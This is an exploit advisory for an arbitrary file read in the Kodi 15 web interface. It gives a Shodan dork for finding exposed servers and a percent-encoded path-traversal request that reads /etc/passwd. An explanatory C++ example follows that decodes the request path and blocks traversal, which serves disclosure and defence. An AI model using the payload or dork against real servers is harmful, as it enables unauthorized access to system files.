Kodi 15 – Web Interface Arbitrary File Access

  • Author: Machiel Pronk
    Date: 2015-12-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38833/
  • # Exploit Title: arbitrary file access kodi web interface
    # Shodan dork: title:kodi
    # Date: 25-11-2015
    # Contact: https://twitter.com/mpronk89
    # Software Link: http://kodi.tv/
    # Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
    # Version: v15
    # Tested on: linux
    # CVE : n/a
    
    The Kodi web interface is vulnerable to arbitrary file read.
    
    Example (retrieves passwd):
    <ip>:<port>/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
    
    (Issue fixed in 2012, reintroduced in February 2015. Fixed again in November
    2015 for v16.)
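
In the request above the path separators only appear once the `%2f` escapes are decoded, so a containment check has to run on the decoded path. The following C++ is an added example of such a check, not Kodi's code or its fix; `percent_decode`, `resolve_request_path` and the `/srv/webroot` root are hypothetical names chosen for illustration.

```cpp
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

// Decode %XX escapes once; false on a malformed escape or an encoded NUL byte.
static bool percent_decode(const std::string& in, std::string& out) {
    out.clear();
    for (size_t i = 0; i < in.size(); ++i) {
        if (in[i] != '%') { out += in[i]; continue; }
        if (i + 2 >= in.size()) return false;
        unsigned char h = in[i + 1], l = in[i + 2];
        if (!std::isxdigit(h) || !std::isxdigit(l)) return false;
        int v = std::stoi(in.substr(i + 1, 2), nullptr, 16);
        if (v == 0) return false;
        out += static_cast<char>(v);
        i += 2;
    }
    return true;
}

// Hypothetical helper: map a request path under web_root, or return false to refuse.
bool resolve_request_path(const std::string& web_root, const std::string& raw,
                          std::string& resolved) {
    std::string decoded, seg;
    if (!percent_decode(raw, decoded)) return false;
    // Strict choice: refuse leftover escapes (double encoding) and backslashes.
    if (decoded.find_first_of("%\\") != std::string::npos) return false;
    std::vector<std::string> parts;
    decoded += '/';  // sentinel so the final segment is flushed
    for (char c : decoded) {
        if (c != '/') { seg += c; continue; }
        if (seg == "..") {
            if (parts.empty()) return false;  // would climb above web_root
            parts.pop_back();
        } else if (!seg.empty() && seg != ".") {
            parts.push_back(seg);
        }
        seg.clear();
    }
    resolved = web_root;
    for (const std::string& p : parts) resolved += "/" + p;
    return true;
}

int main() {
    std::string out;  // "/srv/webroot" is a constructed example root
    bool ok = resolve_request_path("/srv/webroot", "/%2f..%2f..%2fetc%2fpasswd", out);
    std::cout << (ok ? out : std::string("refused")) << "\n";
}
```

The check is lexical only; a server that follows symlinks inside the web root also needs to canonicalise the final on-disk path before opening it.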